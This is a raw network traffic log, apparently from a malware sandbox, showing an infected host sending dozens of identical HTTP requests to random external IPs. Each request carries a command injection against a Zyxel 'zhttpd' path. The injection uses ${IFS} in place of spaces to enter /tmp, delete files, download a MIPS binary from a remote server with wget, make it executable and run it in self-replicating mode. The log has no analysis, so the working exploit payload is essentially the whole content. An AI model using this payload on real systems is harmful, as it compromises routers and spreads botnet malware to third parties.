                                    Jan 13, 2024 19:02:37.251473904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5054192.168.2.133483071.121.156.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251548052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5055192.168.2.1354108131.80.206.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251580954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5056192.168.2.1350514141.32.99.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251637936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5057192.168.2.13394008.13.213.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251681089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5058192.168.2.135000017.19.176.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251720905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5059192.168.2.1338166157.43.21.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251775980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5060192.168.2.1344634110.142.33.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251852989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5061192.168.2.133866283.15.215.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251924992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5062192.168.2.135713420.237.49.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251980066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5063192.168.2.134664025.76.116.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252043962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5064192.168.2.134451865.115.23.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252124071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5065192.168.2.1350060136.224.163.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252134085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5066192.168.2.1338148187.180.79.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252214909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5067192.168.2.1353656155.80.113.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252254963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5068192.168.2.134455281.179.32.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252284050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5069192.168.2.135173090.113.25.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252340078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5070192.168.2.1333166203.12.108.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252391100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5071192.168.2.1359884196.119.108.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252434015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5072192.168.2.134598017.182.247.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252496958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5073192.168.2.1333352216.218.97.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252537012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5074192.168.2.1343990185.167.39.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252567053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5075192.168.2.134376668.77.198.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252624989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5076192.168.2.13546222.131.50.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252690077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5077192.168.2.134602247.79.9.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252753973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5078192.168.2.1337648210.180.208.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252798080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5079192.168.2.1352454110.199.103.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252830982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5080192.168.2.1353904187.61.67.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252898932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5081192.168.2.1333598107.163.207.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.252964020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5082192.168.2.1360726167.49.185.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253005981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5083192.168.2.133714461.136.190.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253082037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5084192.168.2.1358430146.66.93.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253114939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5085192.168.2.1349834222.147.202.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253186941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5086192.168.2.135314883.47.169.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253246069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5087192.168.2.1345968184.38.214.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253279924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5088192.168.2.135385679.157.77.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253354073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5089192.168.2.1336772101.150.78.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253376007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5090192.168.2.135828646.13.143.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253443003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5091192.168.2.1339222103.21.32.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253474951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5092192.168.2.1354682191.40.37.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253519058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5093192.168.2.134509617.4.32.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253616095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5094192.168.2.134063499.120.56.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253669977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5095192.168.2.133887818.239.63.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253720999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5096192.168.2.1342540202.59.38.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253784895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5097192.168.2.1357368201.228.118.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253844023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5098192.168.2.1336514165.250.2.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253905058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5099192.168.2.1356126198.58.162.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.253935099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5100192.168.2.1344716174.216.141.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254004955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5101192.168.2.13550029.247.43.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254053116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5102192.168.2.133310096.44.207.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254095078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5103192.168.2.1334094147.148.62.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254147053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5104192.168.2.1342244138.28.14.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254188061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5105192.168.2.134944443.227.53.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254245996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5106192.168.2.1354866210.185.92.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254280090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5107192.168.2.1338196219.79.135.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254342079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5108192.168.2.135253496.165.44.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254379988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5109192.168.2.1348564195.206.170.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254447937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5110192.168.2.134517899.38.122.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254506111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5111192.168.2.1353480218.162.201.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254575014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5112192.168.2.1355344174.195.34.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254631996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5113192.168.2.1357728136.198.61.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254673004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5114192.168.2.135601017.33.222.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254731894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5115192.168.2.1360350118.133.1.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.254765987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5116192.168.2.135700466.106.203.128443
                                    TimestampBytes transferredDirectionData
